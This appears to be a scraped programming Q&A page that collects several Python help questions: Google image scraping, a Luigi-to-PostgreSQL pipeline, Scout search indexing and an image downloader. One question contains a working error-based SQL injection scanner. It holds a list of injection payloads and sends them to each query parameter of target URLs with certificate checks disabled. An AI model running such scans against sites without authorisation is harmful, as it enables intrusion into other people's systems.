Python put String To Text File - python

I'm using Python to save img to the folder, see the code:
def save_image(raw_image, image_type, save_directory):
extension = image_type if image_type else 'jpg'
file_name = str(uuid.uuid4().hex) + "." + extension
save_path = os.path.join(save_directory, file_name)
with open(save_path, 'wb+') as image_file:
image_file.write(raw_image)
I want to also save in a text file line by line the same name, can someone tell me how to do this?
complete code:
#thanks https://gist.github.com/genekogan/ebd77196e4bf0705db51f86431099e57
import argparse
import json
import itertools
import logging
import re
import os
import uuid
import sys
from urllib.request import urlopen, Request
from bs4 import BeautifulSoup
def configure_logging():
logger = logging.getLogger()
logger.setLevel(logging.DEBUG)
handler = logging.StreamHandler()
handler.setFormatter(
logging.Formatter('[%(asctime)s %(levelname)s %(module)s]: %(message)s'))
logger.addHandler(handler)
return logger
logger = configure_logging()
REQUEST_HEADER = {
'User-Agent': "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.134 Safari/537.36"}
def get_soup(url, header):
response = urlopen(Request(url, headers=header))
return BeautifulSoup(response, 'html.parser')
def get_query_url(query):
return "https://www.google.co.in/search?q=%s&tbm=isch&source=lnt&tbs=isz:l&sa=X&ved=0ahUKEwjpx6rng6faAhWIzlMKHSHBB8oQpwUIHg&biw=1366&bih=702&dpr=1" % query
def extract_images_from_soup(soup):
image_elements = soup.find_all("div", {"class": "rg_meta"})
metadata_dicts = (json.loads(e.text) for e in image_elements)
link_type_records = ((d["ou"], d["ity"]) for d in metadata_dicts)
return link_type_records
def extract_images(query, num_images):
url = get_query_url(query)
logger.info("Souping")
soup = get_soup(url, REQUEST_HEADER)
logger.info("Extracting image urls")
link_type_records = extract_images_from_soup(soup)
return itertools.islice(link_type_records, num_images)
def get_raw_image(url):
req = Request(url, headers=REQUEST_HEADER)
resp = urlopen(req)
return resp.read()
def save_image(raw_image, image_type, save_directory):
extension = image_type if image_type else 'jpg'
file_name = str(uuid.uuid4().hex) + "." + extension
save_path = os.path.join(save_directory, file_name)
with open(save_path, 'wb+') as image_file:
image_file.write(raw_image)
def download_images_to_dir(images, save_directory, num_images):
for i, (url, image_type) in enumerate(images):
try:
logger.info("Making request (%d/%d): %s", i, num_images, url)
raw_image = get_raw_image(url)
save_image(raw_image, image_type, save_directory)
except Exception as e:
logger.exception(e)
def run(query, save_directory, num_images=100):
query = '+'.join(query.split())
logger.info("Extracting image links")
images = extract_images(query, num_images)
logger.info("Downloading images")
download_images_to_dir(images, save_directory, num_images)
logger.info("Finished")
def main():
parser = argparse.ArgumentParser(description='Scrape Google images')
parser.add_argument('-s', '--search', default='bananas', type=str, help='search term')
parser.add_argument('-n', '--num_images', default=1, type=int, help='num images to save')
parser.add_argument('-d', '--directory', default='C:/Users/user/desktop/potter/images', type=str, help='save directory')
args = parser.parse_args()
run(args.search, args.directory, args.num_images)
if __name__ == '__main__':
main()

Related

i am getting error at pushing data to a pgSQL server in Luigi even-thou if i run the python script it works completely fine

I was building a data pipeline that gets json data from a url and changes it into csv format than i clean the data a bit and then push data to a sql server
Everything works of except for last task i am getting this error
RuntimeError: Unfulfilled dependency at run time: dataclean__99914b932b
import requests
import luigi
from bs4 import BeautifulSoup
import json
import csv
import pandas as pd
import psycopg2
class scrapper(luigi.Task):
"""
Get data from nycstationinfo.com
"""
def output(self):
return luigi.LocalTarget("nycbikedata.json")
def run(self):
headers = {
'Access-Control-Allow-Origin': '*',
'Access-Control-Allow-Methods': 'GET',
'Access-Control-Allow-Headers': 'Content-Type',
'Access-Control-Max-Age': '3600',
'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0'
}
url = "https://gbfs.citibikenyc.com/gbfs/en/station_information.json"
req = requests.get(url, headers)
soup = BeautifulSoup(req.content, 'html.parser')
#get the whole dump of the webpage in pretified form
data = soup.prettify()
#removing back slashes due to wraping
json_string = json.dumps(data)
mod_json_strings = json.loads(json_string)
#writing the formated data in a file
with self.output().open('w') as outfile:
outfile.write(mod_json_strings)
class converter(luigi.Task):
def requires(self):
return scrapper()
def output(self):
return luigi.LocalTarget("nycbikedata.csv")
def run(self):
#opening json file with data
with self.input().open('r') as json_file:
data = json.load(json_file)
#all the data is in station object data.json file
station = data['data']['stations']
data_file = self.output().open('w')
csv_writer = csv.writer(data_file)
count = 0
for x in station:
if count == 0:
# Writing headers of CSV file
header = x.keys()
csv_writer.writerow(header)
count += 1
# Writing data of CSV file
csv_writer.writerow(x.values())
data_file.close()
class dataclean(luigi.Task):
def requires(self):
return converter()
def run(self):
df = pd.read_csv(self.input().open('r'))
x = df.drop(df.columns[6:], axis = 1 )
x = x[:1001]
x.to_csv('formated.csv', index=False)
class datapush(luigi.Task):
def requires(self):
return dataclean()
def run(self):
hostname = 'localhost'
database = 'mydb2'
username = 'bob'
pwd = 'admin'
port_id = 5432
try:
conn = psycopg2.connect(
host = hostname,
dbname = database,
user = username,
password = pwd,
port = port_id)
cur = conn.cursor()
create_script = '''CREATE TABLE IF NOT EXISTS nyc_station(
name varchar(240),
lon float,
lat float,
region_id int,
rental_methods varchar(140),
station_id int); '''
cur.execute(create_script)
sql2 = '''COPY nyc_station(name,lon,lat,region_id,rental_methods,station_id)
FROM '/home/wassey/luigi-demo/formated.csv'
DELIMITER ','
CSV HEADER;'''
cur.execute(sql2)
conn.commit()
except Exception as error:
print('error')
finally:
if cur is not None:
cur.close()
if conn is not None:
conn.close()
if __name__ == "__main__":
luigi.run()
All the tasks work fine except for the datapush but i seprately run the script it works completly fine and pushes the data

Unable to remove new lines from list in python scanner

I am trying to create a simple error-based SQLI scanner that simply tacks on some common sqli payloads to the ends of query values in urls. I seem to have this working when providing a single url but I cannot get this to work properly when passing a file of urls. The lists of urls with the payloads come back but I have been unable to figure out how to remove the '\n' at the end of each url in the list so that I can request each url.
import argparse
from concurrent.futures import ThreadPoolExecutor
import requests
from urllib.parse import urlparse, urlunparse, quote_plus
print('\t SQLiScan')
# arguments
def getArgs():
parser = argparse.ArgumentParser(description = 'Error-based SQLi scan')
parser.add_argument('-l', '--list', help='List of target urls')
parser.add_argument('-u', '--url', help='Target url')
args = parser.parse_args()
return args
# Load file of urls for scan
def loadFile(file):
target_urls = []
with open(args.list, 'r') as f:
for url in f.readlines():
url = url.rstrip('\n')
target_urls.append(url)
return target_urls
# Append payloads to urls
def appendPayload(url):
result = []
payloads = ["1'",'1"',"[1]","[]=1","1`","1/*'*/","1/*!1111'*/",
"1'||'asd'||'","1' or '1'='1","1 or 1=1","'or''='",
"'1 or 1='1"]
parsed = urlparse(url)
queries = parsed.query.split('&')
for payload in payloads:
new_query = "&".join(["{}{}".format(query,payload) for query in queries])
parsed = parsed._replace(query=new_query)
result.append(urlunparse(parsed))
request_url = "\n".join(map(str,result))
request_url = quote_plus(request_url, safe='\n:/')
return request_url
if __name__ == '__main__':
args = getArgs()
url = args.url
urls = loadFile(args.list)
appendPayload(url)
This returns a list like this:
['https://www.example.com/sneakers/products/air-jordan-6-retro-unc-1332b420-74d9-439c-9cb1-2bda1b0c8417%3F_branch_match_id%3D9102014032084224211%27\nhttps://www.example.com/sneakers/products/air-jordan-6-retro-unc-1332b420-74d9-439c-9cb1-2bda1b0c8417%3F_branch_match_id%3D9102014032084224211%22\nhttps://www.example.com/sneakers/products/air-jordan-6-retro-unc-1332b420-74d9-439c-9cb1-2bda1b0c8417%3F_branch_match_id%3D910201403208422421%5B1%5D\nhttps://www.example.com/sneakers/products/air-jordan-6-retro-unc-1332b420-74d9-439c-9cb1-2bda1b0c8417%3F_branch_match_id%3D910201403208422421%5B%5D%3D1\nhttps://www.example.com/sneakers/products/air-jordan-6-retro-unc-1332b420-74d9-439c-9cb1-2bda1b0c8417%3F_branch_match_id%3D9102014032084224211%60\nhttps://www.example.com/sneakers/products/air-jordan-6-retro-unc-1332b420-74d9-439c-9cb1-2bda1b0c8417%3F_branch_match_id%3D9102014032084224211/%2A%27%2A/\nhttps://www.example.com/sneakers/products/air-jordan-6-retro-unc-1332b420-74d9-439c-9cb1-2bda1b0c8417%3F_branch_match_id%3D9102014032084224211/%2A%211111%27%2A/\nhttps://www.example.com/sneakers/products/air-jordan-6-retro-unc-1332b420-74d9-439c-9cb1-2bda1b0c8417%3F_branch_match_id%3D9102014032084224211%27%7C%7C%27asd%27%7C%7C%27\nhttps://www.example.com/sneakers/products/air-jordan-6-retro-unc-1332b420-74d9-439c-9cb1-2bda1b0c8417%3F_branch_match_id%3D9102014032084224211%27+or+%271%27%3D%271\nhttps://www.example.com/sneakers/products/air-jordan-6-retro-unc-1332b420-74d9-439c-9cb1-2bda1b0c8417%3F_branch_match_id%3D9102014032084224211+or+1%3D1\nhttps://www.example.com/sneakers/products/air-jordan-6-retro-unc-1332b420-74d9-439c-9cb1-2bda1b0c8417%3F_branch_match_id%3D910201403208422421%27or%27%27%3D%27\nhttps://www.example.com/sneakers/products/air-jordan-6-retro-unc-1332b420-74d9-439c-9cb1-2bda1b0c8417%3F_branch_match_id%3D910201403208422421%271+or+1%3D%271']
After updating code, I am still having difficulty requesting each url properly:
# Load file of urls for scan
def loadFile(file):
target_urls = []
with open(args.list, 'r') as f:
for url in f.readlines():
url = url.rstrip('\n')
target_urls.append(url)
return target_urls
# Append payloads to urls
def appendPayload(url):
result = []
payloads = ["1'",'1"',"[1]","[]=1","1`","1/*'*/","1/*!1111'*/",
"1'||'asd'||'","1' or '1'='1","1 or 1=1","'or''='",
"'1 or 1='1"]
parsed = urlparse(url)
queries = parsed.query.split('&')
for payload in payloads:
new_query = "&".join(["{}{}".format(query,payload) for
query in queries])
parsed = parsed._replace(query=new_query)
result.append(urlunparse(parsed))
# request_url = ",".join(map(str, result))
# result = [quote_plus(x, safe='\n:/') for x in result]
print(result)
return result
if __name__ == '__main__':
args = getArgs()
url = args.url
urls = loadFile(args.list)
for url in urls:
request = requests.get(appendPayload(url))
This is returning:
requests.exceptions.InvalidSchema: No connection adapters were found for '["http://exampe.com/&esheet=52378722&newsitemid=20210215005043&lan=en-US&anchor=example.com&index=1&md5=3367aa50e8bdfe66b505f114178eb403?1\'", \'http://example.com/&esheet=52378722&newsitemid=20210215005043&lan=en-US&anchor=example.com&index=1&md5=3367aa50e8bdfe66b505f114178eb403?1"\', \'http://example.com/&esheet=52378722&newsitemid=20210215005043&lan=en-US&anchor=example.com&index=1&md5=3367aa50e8bdfe66b505f114178eb403?[1]\', \'http://example.com/&esheet=52378722&newsitemid=20210215005043&lan=en-US&anchor=example.com&index=1&md5=3367aa50e8bdfe66b505f114178eb403?[]=1\', \'http://example.com/&esheet=52378722&newsitemid=20210215005043&lan=en-US&anchor=example.com&index=1&md5=3367aa50e8bdfe66b505f114178eb403?1`\', "http://example.com/&esheet=52378722&newsitemid=20210215005043&lan=en-US&anchor=example.com&index=1&md5=3367aa50e8bdfe66b505f114178eb403?1/*\'*/", "http://example.com/&esheet=52378722&newsitemid=20210215005043&lan=en-US&anchor=example.com&index=1&md5=3367aa50e8bdfe66b505f114178eb403?1/*!1111\'*/", "http://example.com/&esheet=52378722&newsitemid=20210215005043&lan=en-US&anchor=example.com&index=1&md5=3367aa50e8bdfe66b505f114178eb403?1\'||\'asd\'||\'", "http://example.com/&esheet=52378722&newsitemid=20210215005043&lan=en-US&anchor=example.com&index=1&md5=3367aa50e8bdfe66b505f114178eb403?1\' or \'1\'=\'1", \'http://example.com/&esheet=52378722&newsitemid=20210215005043&lan=en-US&anchor=example.com&index=1&md5=3367aa50e8bdfe66b505f114178eb403?1 or 1=1\', "http://example.com/&esheet=52378722&newsitemid=20210215005043&lan=en-US&anchor=example.com&index=1&md5=3367aa50e8bdfe66b505f114178eb403?\'or\'\'=\'", "http://example.com/&esheet=52378722&newsitemid=20210215005043&lan=en-US&anchor=example.com&index=1&md5=3367aa50e8bdfe66b505f114178eb403?\'1 or 1=\'1"]'
Seems like it may have to do with some of the '' appearing in front of the https: in some of the lines
Update:
After much trying, I finally got this working the way I was looking for.
import argparse
from concurrent.futures import ThreadPoolExecutor
import requests
import sys
import time
from urllib.parse import urlparse, urlunparse, quote_plus
from urllib3.exceptions import InsecureRequestWarning
# Suppress only the single warning from urllib3 needed.
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
print('\t SQLiScan')
# arguments
def getArgs():
parser = argparse.ArgumentParser(description = 'Error-based SQLi scan')
parser.add_argument('-l', '--list', help='List of target urls')
parser.add_argument('-u', '--url', help='Target url')
args = parser.parse_args()
return args
# Load file of urls for scan
def loadFile(file):
target_urls = []
with open(args.list, 'r') as f:
for url in f.readlines():
url = url.rstrip('\n')
target_urls.append(url)
return target_urls
# Append payloads to urls
def appendPayload(data):
targets = []
encoded = []
payloads = ["1'",'1"',"[1]","[]=1","1`","1/*'*/","1/*!1111'*/",
"1'||'asd'||'","1' or '1'='1","1 or 1=1","'or''='",
"'1 or 1='1"]
for url in data:
parsed_url = urlparse(url)
url_queries = parsed_url.query.split("&")
for payload in payloads:
new_query = "&".join([ "{}{}".format(query, payload) for query in url_queries])
parsed = parsed_url._replace(query=new_query)
targets.append(urlunparse(parsed))
for target in targets:
encode = quote_plus(target, safe='\n:/')
encoded.append(encode)
return encoded
args = getArgs()
data = loadFile(args.list)
targets = appendPayload(data)
counter = 0
for target in targets:
counter += 1
print(f'\r{counter} Requests sent', end='', flush=True)
r = requests.get(target, verify=False)
if r.status_code == 500 or r.status_code == 302:
print(r.status_code, + " ", + target)

How do you send many documents to a Scout Server in Python using the Python Scout Client?

Im trying to index PDF text to a python lib called Scout. I have tried doing the same thing with elasticsearch too. In both cases I can't figure out how to post text to an index in bulk, using python.
After a lot of research, I believe I need to use async http request. The only problem is, I don't understand async calls nor do I understand what a Scout python 'client' really is. I'm a self-taught programmer and still have many things I don't understand. my thought is the client cant stay open for a loop to keep using the connection. I have seen coding concepts like "await" and "sessions" in many books on programming. However, I don't know how to implement these concepts. Can someone help me write some python code that will successfully post new documents to a running scout server and explain how it's done?
Here is My attempt:
from scout_client import Scout
# import libraries to help read and create PDF
import PyPDF2
from fpdf import FPDF
import base64
import os
from flask import Flask, jsonify, request, render_template, json
# before you start, Run the Server.py file and create a Sqlite DB
# Step one loop though PDF in 'books' folder
for k in range(14,15):
# open the pdf file
read_pdf = PyPDF2.PdfFileReader("books/%s.pdf"%(k))
# Test to see if Step one is complete and succesful
#print (read_pdf)
# Step Two Gain intel on how many Pages are in the Document
# get the page numbers
num = read_pdf.getNumPages()
print ("PDF pages:", num)
# Step Three understand the data by page
# create a dictionary object for page data
all_pages = []
# Step For Create a new index in Scout Server
# client.create_index('test3')
# iterate the page numbers
for page in range(num):
data = read_pdf.getPage(page)
#page_mode = read_pdf.getPageMode()
# extract the page's text
page_text = data.extractText()
# put the text data into the dict
all_pages.append(page_text)
# initiate the Client from scout_client.py
client = Scout('http://localhost:8000')
# THe issue: I tryed for loops, and while loops but cant get past: urllib.error.HTTPError: HTTP Error 400: BAD REQUEST
i = 1
while i <= num:
client.create_document(all_pages[i],['test3'])
print(i,"....done")
i += 1
I get an error:
Traceback (most recent call last):
File "test.py", line 37, in <module>
client.create_document(all_pages[i],['test3'])
File "../Searchtest4/scout/scout_client.py", line 149, in create_document
return self.post('/documents/', post_data, attachments)
File "../Searchtest4/scout/scout_client.py", line 53, in post
return self.post_json(url, data)
File "../Searchtest4/scout/scout_client.py", line 63, in post_json
return json.loads(urlopen(request).read().decode('utf8'))
File "../lib/python3.7/urllib/request.py", line 222, in urlopen
return opener.open(url, data, timeout)
File "../lib/python3.7/urllib/request.py", line 531, in open
response = meth(req, response)
File "../lib/python3.7/urllib/request.py", line 641, in http_response
'http', request, response, code, msg, hdrs)
File "../lib/python3.7/urllib/request.py", line 569, in error
return self._call_chain(*args)
File "../lib/python3.7/urllib/request.py", line 503, in _call_chain
result = func(*args)
File "../lib/python3.7/urllib/request.py", line 649, in http_error_default
raise HTTPError(req.full_url, code, msg, hdrs, fp)
**urllib.error.HTTPError: HTTP Error 400: BAD REQUEST**
Here is the server that runs fine (server.py):
import logging
import optparse
import os
import sys
from flask import Flask
from werkzeug.serving import run_simple
from scout.exceptions import InvalidRequestException
from scout.models import database
from scout.models import Attachment
from scout.models import BlobData
from scout.models import Document
from scout.models import Index
from scout.models import IndexDocument
from scout.models import Metadata
from scout.views import register_views
logger = logging.getLogger('scout')
def create_server(config=None, config_file=None):
app = Flask(__name__)
# Configure application using a config file.
if config_file is not None:
app.config.from_pyfile(config_file)
# (Re-)Configure application using command-line switches/environment flags.
if config is not None:
app.config.update(config)
# Initialize the SQLite database.
initialize_database(app.config.get('DATABASE') or 'scout.db',
pragmas=app.config.get('SQLITE_PRAGMAS') or None)
register_views(app)
#app.errorhandler(InvalidRequestException)
def handle_invalid_request(exc):
return exc.response()
#app.before_request
def connect_database():
if database.database != ':memory:':
database.connect()
#app.teardown_request
def close_database(exc):
if database.database != ':memory:' and not database.is_closed():
database.close()
return app
def initialize_database(database_file, pragmas=None):
database.init(database_file, pragmas=pragmas)
try:
meth = database.execution_context
except AttributeError:
meth = database
with meth:
database.create_tables([
Attachment,
BlobData,
Document,
Index,
IndexDocument,
Metadata])
def run(app):
if app.config['DEBUG']:
app.run(host=app.config['HOST'], port=app.config['PORT'], debug=True)
else:
run_simple(
hostname=app.config['HOST'],
port=app.config['PORT'],
application=app,
threaded=True)
def panic(s, exit_code=1):
sys.stderr.write('\033[91m%s\033[0m\n' % s)
sys.stderr.flush()
sys.exit(exit_code)
def get_option_parser():
parser = optparse.OptionParser()
parser.add_option(
'-H',
'--host',
default='127.0.0.1',
dest='host',
help='The hostname to listen on. Defaults to 127.0.0.1.')
parser.add_option(
'-p',
'--port',
default=8000,
dest='port',
help='The port to listen on. Defaults to 8000.',
type='int')
parser.add_option(
'-u',
'--url-prefix',
dest='url_prefix',
help='URL path to prefix Scout API.')
parser.add_option(
'-s',
'--stem',
dest='stem',
help='Specify stemming algorithm for content.')
parser.add_option(
'-d',
'--debug',
action='store_true',
dest='debug',
help='Run Flask app in debug mode.')
parser.add_option(
'-c',
'--config',
dest='config',
help='Configuration module (python file).')
parser.add_option(
'--paginate-by',
default=50,
dest='paginate_by',
help='Number of documents displayed per page of results, default=50',
type='int')
parser.add_option(
'-k',
'--api-key',
dest='api_key',
help='Set the API key required to access Scout.')
parser.add_option(
'-C',
'--cache-size',
default=64,
dest='cache_size',
help='SQLite page-cache size (MB). Defaults to 64MB.',
type='int')
parser.add_option(
'-f',
'--fsync',
action='store_true',
dest='fsync',
help='Synchronize database to disk on every write.')
parser.add_option(
'-j',
'--journal-mode',
default='wal',
dest='journal_mode',
help='SQLite journal mode. Defaults to WAL (recommended).')
parser.add_option(
'-l',
'--logfile',
dest='logfile',
help='Log file')
return parser
def parse_options():
option_parser = get_option_parser()
options, args = option_parser.parse_args()
if options.logfile:
handler = logging.FileHandler(options.logfile)
logger.addHandler(handler)
config_file = os.environ.get('SCOUT_CONFIG') or options.config
config = {'DATABASE': os.environ.get('SCOUT_DATABASE')}
if len(args) == 0 and not config['DATABASE']:
panic('Error: missing required path to database file.')
elif len(args) > 1:
panic('Error: [%s] only accepts one argument, which is the path '
'to the database file.' % __file__)
elif args:
config['DATABASE'] = args[0]
pragmas = [('journal_mode', options.journal_mode)]
if options.cache_size:
pragmas.append(('cache_size', -1024 * options.cache_size))
if not options.fsync:
pragmas.append(('synchronous', 0))
config['SQLITE_PRAGMAS'] = pragmas
# Handle command-line options. These values will override any values
# that may have been specified in the config file.
if options.api_key:
config['AUTHENTICATION'] = options.api_key
if options.debug:
config['DEBUG'] = True
config['HOST'] = options.host or '127.0.0.1'
config['PORT'] = options.port or 8000
config['URL_PREFIX'] = options.url_prefix or ''
if options.paginate_by:
if options.paginate_by < 1 or options.paginate_by > 1000:
panic('paginate-by must be between 1 and 1000')
config['PAGINATE_BY'] = options.paginate_by
if options.stem:
if options.stem not in ('simple', 'porter'):
panic('Unrecognized stemmer. Must be "porter" or "simple".')
config['STEM'] = options.stem
return create_server(config, config_file)
def main():
app = parse_options()
run(app)
if __name__ == '__main__':
main()
and the so-called client (scout_client.py):
import base64
import json
try:
from email.generator import _make_boundary as choose_boundary
except ImportError:
from mimetools import choose_boundary
import mimetypes
import os
try:
from urllib.parse import urlencode
except ImportError:
from urllib import urlencode
try:
from urllib.request import Request
from urllib.request import urlopen
except ImportError:
from urllib2 import Request
from urllib2 import urlopen
import zlib
ENDPOINT = None
KEY = None
class Scout(object):
def __init__(self, endpoint=ENDPOINT, key=KEY):
self.endpoint = endpoint.rstrip('/')
self.key = key
def get_full_url(self, url):
return self.endpoint + url
def get_raw(self, url, **kwargs):
headers = {'Content-Type': 'application/json'}
if self.key:
headers['key'] = self.key
if kwargs:
if '?' not in url:
url += '?'
url += urlencode(kwargs, True)
request = Request(self.get_full_url(url), headers=headers)
fh = urlopen(request)
return fh.read()
def get(self, url, **kwargs):
return json.loads(self.get_raw(url, **kwargs))
def post(self, url, data=None, files=None):
if files:
return self.post_files(url, data, files)
else:
return self.post_json(url, data)
def post_json(self, url, data=None):
headers = {'Content-Type': 'application/json'}
if self.key:
headers['key'] = self.key
data = json.dumps(data or {})
if not isinstance(data, bytes):
data = data.encode('utf-8')
request = Request(self.get_full_url(url), data=data, headers=headers)
return json.loads(urlopen(request).read().decode('utf8'))
def post_files(self, url, json_data, files=None):
if not files or not isinstance(files, dict):
raise ValueError('One or more files is required. Files should be '
'passed as a dictionary of filename: file-like-'
'object.')
boundary = choose_boundary()
form_files = []
for i, (filename, file_obj) in enumerate(files.items()):
try:
data = file_obj.read()
except AttributeError:
data = bytes(file_obj)
mimetype = mimetypes.guess_type(filename)[0]
form_files.append((
'file_%s' % i,
filename,
mimetype or 'application/octet-stream',
data))
part_boundary = '--' + boundary
parts = [
part_boundary,
'Content-Disposition: form-data; name="data"',
'',
json.dumps(json_data)]
for field_name, filename, mimetype, data in form_files:
parts.extend((
part_boundary,
'Content-Disposition: file; name="%s"; filename="%s"' % (
field_name, filename),
'Content-Type: %s' % mimetype,
'',
data))
parts.append('--' + boundary + '--')
parts.append('')
headers = {'Content-Type': 'multipart/form-data; boundary=%s' %
boundary}
if self.key:
headers['key'] = self.key
data = '\r\n'.join(parts)
if not isinstance(data, bytes):
data = data.encode('utf-8')
request = Request(self.get_full_url(url), data=data, headers=headers)
return json.loads(urlopen(request).read())
def delete(self, url):
headers = {}
if self.key:
headers['key'] = self.key
request = Request(self.get_full_url(url), headers=headers)
request.get_method = lambda: 'DELETE'
fh = urlopen(request)
return json.loads(fh.read())
def get_indexes(self, **kwargs):
return self.get('/', **kwargs)['indexes']
def create_index(self, name):
return self.post('/', {'name': name})
def rename_index(self, old_name, new_name):
return self.post('/%s/' % old_name, {'name': new_name})
def delete_index(self, name):
return self.delete('/%s/' % name)
def get_index(self, name, **kwargs):
return self.get('/%s/' % name, **kwargs)
def get_documents(self, **kwargs):
return self.get('/documents/', **kwargs)
def create_document(self, content, indexes, identifier=None,
attachments=None, **metadata):
if not isinstance(indexes, (list, tuple)):
indexes = [indexes]
post_data = {
'content': content,
'identifier': identifier,
'indexes': indexes,
'metadata': metadata}
return self.post('/documents/', post_data, attachments)
def update_document(self, document_id=None, content=None, indexes=None,
metadata=None, identifier=None, attachments=None):
if not document_id and not identifier:
raise ValueError('`document_id` must be provided.')
data = {}
if content is not None:
data['content'] = content
if indexes is not None:
if not isinstance(indexes, (list, tuple)):
indexes = [indexes]
data['indexes'] = indexes
if metadata is not None:
data['metadata'] = metadata
if not data and not attachments:
raise ValueError('Nothing to update.')
return self.post('/documents/%s/' % document_id, data, attachments)
def delete_document(self, document_id=None):
if not document_id:
raise ValueError('`document_id` must be provided.')
return self.delete('/documents/%s/' % document_id)
def get_document(self, document_id=None):
if not document_id:
raise ValueError('`document_id` must be provided.')
return self.get('/documents/%s/' % document_id)
def attach_files(self, document_id, attachments):
return self.post_files('/documents/%s/attachments/' % document_id,
{}, attachments)
def detach_file(self, document_id, filename):
return self.delete('/documents/%s/attachments/%s/' %
(document_id, filename))
def update_file(self, document_id, filename, file_object):
return self.post_files('/documents/%s/attachments/%s/' %
(document_id, filename),
{}, {filename: file_object})
def get_attachments(self, document_id, **kwargs):
return self.get('/documents/%s/attachments/' % document_id, **kwargs)
def get_attachment(self, document_id, filename):
return self.get('/documents/%s/attachments/%s/' %
(document_id, filename))
def download_attachment(self, document_id, filename):
return self.get_raw('/documents/%s/attachments/%s/download/' %
(document_id, filename))
def search_attachments(self, **kwargs):
return self.get('/documents/attachments/', **kwargs)
class SearchProvider(object):
def content(self, obj):
raise NotImplementedError
def identifier(self, obj):
raise NotImplementedError
def metadata(self, obj):
raise NotImplementedError
class SearchSite(object):
def __init__(self, client, index):
self.client = client
self.index = index
self.registry = {}
def register(self, model_class, search_provider):
self.registry.setdefault(model_class, [])
self.registry[model_class].append(search_provider())
def unregister(self, model_class, search_provider=None):
if search_provider is None:
self.registry.pop(model_class, None)
elif model_class in self.registry:
self.registry[model_class] = [
sp for sp in self.registry[model_class]
if not isinstance(sp, search_provider)]
def store(self, obj):
if type(obj) not in self.registry:
return False
for provider in self.registry[type(obj)]:
content = provider.content(obj)
try:
metadata = provider.metadata(obj)
except NotImplementedError:
metadata = {}
try:
identifier = provider.identifier(obj)
except NotImplementedError:
pass
else:
metadata['identifier'] = identifier
self.client.create_document(content, self.index, **metadata)
return True
def remove(self, obj):
if type(obj) not in self.registry:
return False
for provider in self.registry[type(obj)]:
self.client.delete_document(provider.identifier(obj))
return True
Finally the Documentation for Scout:
https://scout.readthedocs.io/en/latest/server.html#index-detail-index-name
https://charlesleifer.com/blog/meet-scout-a-search-server-powered-by-sqlite/
Any Detailed Help is much appreciated:)
So i find a lib called scout and...got it to work!
from scout_client import Scout
# import libraries to help read and create PDF
import PyPDF2
from fpdf import FPDF
import base64
import os
from flask import Flask, jsonify, request, render_template, json
client = Scout('http://localhost:8000')
for k in range(7,18):
read_pdf = PyPDF2.PdfFileReader("books/%s.pdf"%(k))
num = read_pdf.getNumPages()
print ("PDF pages:", num)
all_pages = []
for page in range(num):
data = read_pdf.getPage(page)
page_text = data.extractText()
all_pages.append(page_text)
import requests
for z in all_pages:
url = 'http://localhost:8000/documents/'
data = {'content': z, 'indexes': ['test13']}
headers = {
'Content-Type': 'application/json',
}
response = requests.post(url, data=json.dumps(data), headers=headers)
print(response)
I can now loop though as many PDF's as I want locally
Post to the server for indexing
and search for keywords
Now I just need help with Making a basic front end with a search bar that calls data from a JSON response in python and flask.

Python2 BeautifulSoup returns Blank output

This is the code I am using for downloading the images from Google page. This code is taking time in Evaluating and downloading the images. Hence, I thought of using the Beautifulsoup Library for faster evaluation and download. Check the below original code:
import time
import sys
import os
import urllib2
search_keyword = ['Australia']
keywords = [' high resolution']
def download_page(url):
import urllib2
try:
headers = {}
headers['User-Agent'] = "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.27 Safari/537.17"
req = urllib2.Request(url, headers = headers)
response = urllib2.urlopen(req)
page = response.read()
return page
except:
return"Page Not found"
def _images_get_next_item(s):
start_line = s.find('rg_di')
if start_line == -1:
end_quote = 0
link = "no_links"
return link, end_quote
else:
start_line = s.find('"class="rg_meta"')
start_content = s.find('"ou"',start_line+1)
end_content = s.find(',"ow"',start_content+1)
content_raw = str(s[start_content+6:end_content-1])
return content_raw, end_content
def _images_get_all_items(page):
items = []
while True:
item, end_content = _images_get_next_item(page)
if item == "no_links":
break
else:
items.append(item)
time.sleep(0.1)
page = page[end_content:]
return items
t0 = time.time()
i= 0
while i<len(search_keyword):
items = []
iteration = "Item no.: " + str(i+1) + " -->" + " Item name = " + str(search_keyword[i])
print (iteration)
print ("Evaluating...")
search_keywords = search_keyword[i]
search = search_keywords.replace(' ','%20')
try:
os.makedirs(search_keywords)
except OSError, e:
if e.errno != 17:
raise
pass
j = 0
while j<len(keywords):
pure_keyword = keywords[j].replace(' ','%20')
url = 'https://www.google.com/search?q=' + search + pure_keyword + '&espv=2&biw=1366&bih=667&site=webhp&source=lnms&tbm=isch&sa=X&ei=XosDVaCXD8TasATItgE&ved=0CAcQ_AUoAg'
raw_html = (download_page(url))
time.sleep(0.1)
items = items + (_images_get_all_items(raw_html))
j = j + 1
print ("Total Image Links = "+str(len(items)))
print ("\n")
info = open('output.txt', 'a')
info.write(str(i) + ': ' + str(search_keyword[i-1]) + ": " + str(items) + "\n\n\n")
info.close()
t1 = time.time()
total_time = t1-t0
print("Total time taken: "+str(total_time)+" Seconds")
print ("Starting Download...")
k=0
errorCount=0
while(k<len(items)):
from urllib2 import Request,urlopen
from urllib2 import URLError, HTTPError
try:
req = Request(items[k], headers={"User-Agent": "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.27 Safari/537.17"})
response = urlopen(req,None,15)
output_file = open(search_keywords+"/"+str(k+1)+".jpg",'wb')
data = response.read()
output_file.write(data)
response.close();
print("completed ====> "+str(k+1))
k=k+1;
except IOError:
errorCount+=1
print("IOError on image "+str(k+1))
k=k+1;
except HTTPError as e:
errorCount+=1
print("HTTPError"+str(k))
k=k+1;
except URLError as e:
errorCount+=1
print("URLError "+str(k))
k=k+1;
i = i+1
print("\n")
print("Everything downloaded!")
print("\n"+str(errorCount)+" ----> total Errors")
I thought editing the below code, will help in making the code work with BeautifulSoup Library and my work will be completed faster:
def download_page(url):
import urllib2
try:
headers = {}
headers['User-Agent'] = "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.27 Safari/537.17"
req = urllib2.Request(url, headers = headers)
#response = urllib2.urlopen(req)
#page = response.read()
